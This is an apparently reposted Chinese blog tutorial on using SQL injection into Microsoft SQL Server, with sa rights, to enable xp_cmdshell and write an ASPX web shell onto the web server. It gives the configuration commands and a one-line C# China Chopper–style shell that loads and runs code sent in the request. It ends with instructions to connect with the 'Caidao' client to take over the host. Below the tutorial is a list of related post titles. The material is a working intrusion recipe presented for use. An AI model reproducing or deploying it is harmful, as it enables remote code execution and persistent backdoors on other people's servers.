sql注入创建aspx文件方法
来源:互联网 发布:射频开关矩阵设计方案 编辑:程序博客网 时间:2024/06/13 02:03
先开启xpcmdshell前提是sa用户,可以注入时使用
exec
sp_configure 'show advanced options',1 ;reconfigure ;
go
sp_configure 'xp_cmdshell',1 reconfigure
然后运行创建文件
Exec master.dbo.xp_cmdshell 'echo ^<%@ Page Language=”C#” ValidateRequest=”false” %^>^<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["hez"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%^> >>c:\\web\123.aspx'
菜刀连上拿下
0 0
- sql注入创建aspx文件方法
- Sql注入规则、方法
- SQL注入防范方法
- sql防注入方法
- 防SQL注入方法
- SQL注入的方法
- 防止sql注入方法
- 常用sql注入方法
- 防止SQL注入方法
- 防sql注入方法
- 防止sql注入方法
- 防止sql注入方法
- c# aspx 导出Excel文件的方法
- aspx包含文件过狗方法
- DLL创建与注入方法
- ASPX+MSSQL注入
- sql注入的方法大全
- .net防止SQL注入方法
- 纹理基础
- 重温《JAVA编程思想》----2017.1.25 IO流视频
- 1035.Password (20)
- 给CheckBox加上动画
- 重温《JAVA编程思想》----2017.1.26 IO流(未完待续)
- sql注入创建aspx文件方法
- JavaEE之Maven构建一
- Eclipse配置反编译插件jadclipse
- 重温《JAVA编程思想》----2017.1.26 关于正则表达式的Matcher和Pattern类
- 51NOD 1414 冰雕【水】
- hdu5930 GCD线段树
- 编译配置php
- div+css 学习1
- 浅谈数据结构与算法分析学习及如何进行算法分析